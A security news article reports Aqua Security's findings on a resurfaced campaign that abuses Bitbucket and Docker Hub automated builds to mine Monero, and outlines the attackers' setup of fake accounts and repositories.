According to researchers, these developer resources were also targeted last year for Monero mining but now “the campaign has resurfaced with vengeance.”
In September 2020, Aqua Security’s Team Nautilus discovered a campaign that targeted GitHub and Docker Hub automated build processes for cryptocurrency mining. At the time, the company notified the services, and the attack was blocked.
According to Aqua’s latest report, the same campaign has resurfaced, and this time it is a lot more intense. Within just four days, the attackers have set up around 92 malicious Bitbucket repositories and 92 malicious Docker Hub registries using Aqua Dynamic Threat Analysis (DTA). Their purpose is to perform cryptocurrency mining using these resources.
Unique Integration Process
According to Aqua Security’s lead data analyst Assaf Morag, the threat actors have created a continuous integration process. This is a unique process as it initiates multiple auto-build processes every hour. On each build, they execute a Monero crypto miner.
Straightforward Kill Chain
In this crypto mining campaign, threat actors have used a straightforward kill chain. Firstly, the attackers register multiple fake email IDs via a Russian provider and then set up a Bitbucket account with numerous repositories using official documents to make them appear legit.